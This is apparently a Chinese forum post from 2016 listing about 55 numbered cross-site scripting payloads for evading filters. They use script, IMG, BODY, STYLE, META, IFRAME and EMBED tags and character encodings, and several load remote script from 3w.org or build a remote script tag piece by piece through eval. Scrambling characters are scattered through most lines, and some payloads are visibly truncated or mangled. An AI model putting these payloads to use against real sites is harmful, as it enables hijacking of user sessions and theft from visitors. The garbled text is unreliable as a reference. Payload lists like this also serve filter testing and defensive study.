(1)普通的XSS JavaScript注入
0 o# A) O" q! [+ I* N6 O<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% R2 ^4 w) D; u9 {1 e9 [, \(99)另类弹框
5 \9 Y2 ]9 G, m& t7 D<q/oncut=alert()>1
6 L% V( y- G/ {3 s4 S<s/onclick=alert()>b
" O% Q \' m: c$ H- ?" P6 k/ R" F <XSS=" onclick="alert(1)//">clickme</SSX=">
' G+ A- l& o& t# x <zzz onclick=alert`1`>clickme</zzz>
4 \0 X& v3 A, e( h, {/ c <a onclick=alert`1`>clickme</a>' ^( p0 p+ G" @2 ]) r5 [& G
<a=">clickme</a=">
& r+ @" o z; z1 w7 n/ D# A<a=">clickme</a>
: |! L+ c1 I, p' w<z=">clickme</z="> E7 @$ [. [, Z1 K8 w: J
<z onclick=alert`1`>clickme</z>
% y$ d) L/ c: q1 a* I" K+ g
* W. r5 B3 T- m3 N ^4 d/ v N(2)IMG标签XSS使用JavaScript命令
- X8 D+ F: o( ?4 `/ Z0 m<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 k7 Q9 {( d+ x; r" x; l% _7 Z1 Y0 V! Q5 W: b) q" \0 `
(3)IMG标签无分号无引号) O f1 j) I% L( t6 Y7 x- @
<IMG SRC=javascript:alert(‘XSS’)>
m6 \) r( G8 E5 t/ m
/ W, Z/ X/ M2 s+ T(4)IMG标签大小写不敏感
. C0 u# m' a( K9 r- o5 P# h" _2 v<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# O% B# |# ^" u7 Q$ ~$ X2 }! k$ {3 C, B4 B+ G
(5)HTML编码(必须有分号)
$ b9 z, u9 ?+ O, l" Y& _" E f<IMG SRC=javascript:alert(“XSS”)>
+ D6 v; R: {4 Z" V/ n
- n* b+ S/ y# K3 Y7 q m2 s(6)修正缺陷IMG标签7 |) M/ f1 V* f8 S: B/ R" l
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>" `2 `9 [' o i* Y0 M: Q! u
3 E$ C# k0 [1 [2 g$ i1 t1 |9 n+ s(7)formCharCode标签(计算器)- y; _9 G) `5 d0 A K8 [
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 t# O! Y! }: X8 ?; O, b# R8 f/ {- Z
(8)UTF-8的Unicode编码(计算器)5 y2 A. \# C/ ?* q
<IMG SRC=jav..省略..S')>7 N: c" `+ w+ [" }# C" G: U4 Q
4 U4 ]" l' D @7 u. e(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 j) `7 W% ]6 O6 `$ T<IMG SRC=jav..省略..S')>- i, I e+ ]/ Q) {( x
9 | x3 H6 _- M* z1 W. y(10)十六进制编码也是没有分号(计算器)
l4 ?- w1 z( H8 A q6 N/ R- {<IMG SRC=\'#\'" /span>+ S' V8 G( g. ^+ k. f( l
9 I" F7 e _) F# C1 N! T# T(11)嵌入式标签,将Javascript分开
- z4 a% j% n$ o6 u4 T<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>. X$ c7 p/ }/ s0 `
2 r/ z a" F) [# k2 ?(12)嵌入式编码标签,将Javascript分开
% g5 D! G- ]9 _' b B! B* g<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 U& ?. W. q6 H5 o; P( ]. L' a8 c" e9 {, e) o" R
(13)嵌入式换行符9 |5 V0 g5 e, s9 W" @' A7 L6 C
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>8 E% u4 u' n% i6 ^) ?8 N7 B
5 G2 z! l% S! K5 P, g) `(14)嵌入式回车9 m7 ~5 t5 W- }
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>' F) z. n5 B$ B) f
) \* b; w8 Y) {% ?% {(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 g8 ]/ x: D4 x+ H& \8 W<IMG SRC=\'#\'" /span>
4 D' F0 H- K. \5 B$ l. g: E( M8 P- k: C
(16)解决限制字符(要求同页面), C; _1 Y- ?, X& H
<script>z=’document.’</script>
) D- X2 p$ L, V5 s9 W<script>z=z+’write(“‘</script>
" x8 W7 e4 ^2 _, w<script>z=z+’<script’</script>$ h' G( r5 p4 I e
<script>z=z+’ src=ht’</script>! h2 z8 a6 f. I5 A0 h4 k
<script>z=z+’tp://ww’</script>
2 Z' j4 v# W! u( A2 V9 s<script>z=z+’w.shell’</script>* K. H$ N' z/ F3 @6 X$ k
<script>z=z+’.net/1.’</script>7 w8 g5 S& c2 q9 Q9 J
<script>z=z+’js></sc’</script>
1 q7 D- o5 a: w! Y+ O0 p<script>z=z+’ript>”)’</script>
2 c3 u" @2 W- j# s: [+ t9 E& c6 m<script>eval_r(z)</script>& y( Q+ p; l# W0 ~
6 X3 K% C: s3 I* z! v) k" C' H7 x
(17)空字符( V3 w% h- A- V' W# x
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* |& i5 K+ c/ d; @+ k; r9 `+ t% G
- v, b. S, l. G(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 {2 v+ y. A/ J) m
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
8 Z/ W, c0 x7 [# |
! |9 j2 D2 J2 x(19)Spaces和meta前的IMG标签" z8 X6 C0 T- @) @2 z
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
( _0 }. S+ r, B
! c w7 _3 V: g' p6 [# R9 @6 f(20)Non-alpha-non-digit XSS
- S( a' j7 E+ U2 M: C, _- B! @' s<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>5 Z6 u& l0 f' S+ M% w1 T' o7 B2 H# C
2 h g6 U% [; o/ Z
(21)Non-alpha-non-digit XSS to 2
* f; P- e; h7 Q0 [' Z<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. a, v3 Y$ u4 ?8 z7 o$ K6 \, r# L( P5 ` f
(22)Non-alpha-non-digit XSS to 3
~ l& C( L) G6 q: ^3 Z<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>9 v# x. V2 V" q/ z& I
0 X9 \3 D0 W( C(23)双开括号
6 J- e5 [5 M/ n8 ]" Q! `7 L2 S. Y<<SCRIPT>alert(“XSS”);//<</SCRIPT>/ [1 y: h4 e$ Y6 \/ L
7 m0 F: c# r. i) [' k$ M(24)无结束脚本标记(仅火狐等浏览器)
e4 Q; \0 {: W<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 \+ a' L* _2 D2 h: ?: O9 l
- i/ \: D, Z- [
(25)无结束脚本标记2' }/ ~+ o( @# t! g, Y7 ?: d( j- }5 n
<SCRIPT SRC=//3w.org/XSS/xss.js>
! Z( m# L7 {, `' U- {3 E% a8 U& I$ V0 z6 _( ^$ G h" T
(26)半开的HTML/JavaScript XSS: S; I0 y2 L" x0 G5 o
<IMG SRC=\'#\'" /span>
, }, x! N. d5 I% l7 n' l- a) f! Z+ A/ F8 o& W& c+ |' [- k* n4 u7 K
(27)双开角括号
& B6 o: {6 q" u' L! K8 \<iframe src=http://3w.org/XSS.html <
: e; H/ P: {: i8 z/ s5 A w4 v* g+ ]3 Z( Z
(28)无单引号 双引号 分号3 [, v0 i! ]8 X
<SCRIPT>a=/XSS/5 f: v4 v4 v" i% I. g( W
alert(a.source)</SCRIPT>
( I, E& Z2 i. m
/ d5 K2 p2 G, Y(29)换码过滤的JavaScript
6 `9 @8 }9 g+ r* ^0 p$ y* {% l' v\”;alert(‘XSS’);//4 p8 c8 c! ` Z' J( [
! ]; L5 V" C9 r7 N, K/ _* X(30)结束Title标签
" R j t' j/ g$ S1 p% ]5 X o- D</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ P1 u6 j, l2 @" A! [
% n. k3 r F' Q+ \; i$ X1 H) f% P1 U
(31)Input Image+ A! @/ i6 O, W- c! H3 X
<INPUT SRC=\'#\'" /span>4 U* }' I4 @6 @3 ^
J8 T2 j2 o: ^ s" @, p& ~(32)BODY Image
% m7 X+ l. v! j- N7 V* o<BODY BACKGROUND=”javascript:alert(‘XSS’)”>4 v; s" Y7 w+ A) N8 l% o
( I, k# |4 _6 A- C% ^
(33)BODY标签
$ S9 _ ?7 |5 O/ \. o9 M<BODY(‘XSS’)>
1 p8 C- m% `" L3 y4 ?4 S
0 {9 m W1 o3 m, Z/ j/ g7 Z; Y(34)IMG Dynsrc0 ?9 r* S* l6 R- \4 `5 M, P; b" v2 i
<IMG DYNSRC=\'#\'" /span>+ U! n0 c9 d* F
M, n. Y( S q6 | V
(35)IMG Lowsrc' K6 I# |, y' D t1 d) n
<IMG LOWSRC=\'#\'" /span>
* q6 S6 O4 Q, r8 F; x
# J7 g; c* o ~( G" A3 g2 N(36)BGSOUND3 [! \$ \) M k- Z/ `3 G
<BGSOUND SRC=\'#\'" /span>) y1 N# g) J: W7 {
! {: H" D) Q+ }' T(37)STYLE sheet. _& q; Y9 [; Y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
% w6 T! f$ `3 S, [- h3 y3 W
* h8 l& i+ q% X* Z6 a+ |(38)远程样式表' i$ X, q0 C: P& u9 a
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 O" v- ?0 Y* f. d0 g
) l3 ?$ p' ^4 u! P(39)List-style-image(列表式), u/ F; v' v( V6 Z
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# N8 O/ M3 D8 H8 S5 F
0 D" b' ]7 P& p(40)IMG VBscript1 B* |0 Q) D; a% m, Z u
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS' {/ f! ]& [/ V( \+ U
6 J* G+ @% O2 r' ]- j
(41)META链接url f: ^; z8 k7 u8 J
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. {0 T$ [, N' F- p* H+ {5 x0 A w i9 E' T+ t& ^4 ^
(42)Iframe
0 B- r' e+ G0 M* d `& Y" L0 d$ ?<IFRAME SRC=\'#\'" /IFRAME>1 F- B& m2 k8 q/ p* M4 I
$ F2 z+ x" M6 l$ }& U- A(43)Frame: _9 Z5 n& T/ T( d9 z
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
; s# Z" ^% r( I* ?/ S3 i# |8 a
- B' F% `/ d5 n0 A0 S(44)Table
3 P* c. a4 \0 z6 c1 \<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! w' R& M, \& Z E1 p9 C" i
5 P c! r8 p% a; B
(45)TD9 T9 H4 V. D2 G* w
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- u1 z, N: b/ D( L. Y1 T9 A* L, [$ l. m8 x5 @# c0 W
(46)DIV background-image+ U& g& T1 F7 w2 J" r" C. A* J
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, M, S3 M- b2 ^' J" y( I( k4 J* { Q5 X5 [/ N/ i! c
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 d0 m, F+ v8 n
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
" Y! \6 h; a$ Y- S2 ^ S x# }% s4 \- w: s4 E
(48)DIV expression
) Y: i5 }# e8 N2 m. i- K<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
. v9 w P j9 u" L! A% @
6 y2 p6 f; d2 O: J(49)STYLE属性分拆表达0 y/ Q9 N' V/ t& v; d1 r5 [
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 L% Q3 ^, \* N! p: X
) h1 \9 g7 Z% ^5 p. E7 c(50)匿名STYLE(组成:开角号和一个字母开头): V) M3 Y8 [. s8 D
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& s' \* G* a# z3 \: A% D7 n" W3 ?
! |2 A) r" a2 _, m0 A q(51)STYLE background-image6 J" ~$ m, F" y7 p+ {
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
6 O) b4 k; O6 S, e; l
9 X& g, q) x) D, H- I- R! e(52)IMG STYLE方式 d8 }+ E o; |2 q3 O; a
exppression(alert(“XSS”))’>
2 G) b+ @& \7 R, P% d4 [0 M' g# N& i! a
(53)STYLE background
6 c0 e! D( I2 G/ p1 n- l" Y<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>1 Z- N# F; c: H( A/ O
5 w$ {: ^8 B1 x6 [3 {
(54)BASE
* ]& t4 y. T" |+ z* A0 t<BASE HREF=”javascript:alert(‘XSS’);//”>
) s' `+ ~ U. b7 ~% _! T, U& K3 n6 N0 q
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" c x* X$ b# B0 y, ~+ v5 q/ j
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>" n% n/ p7 p& T
|
发表于 2016-4-28 10:06:15
收藏
支持
反对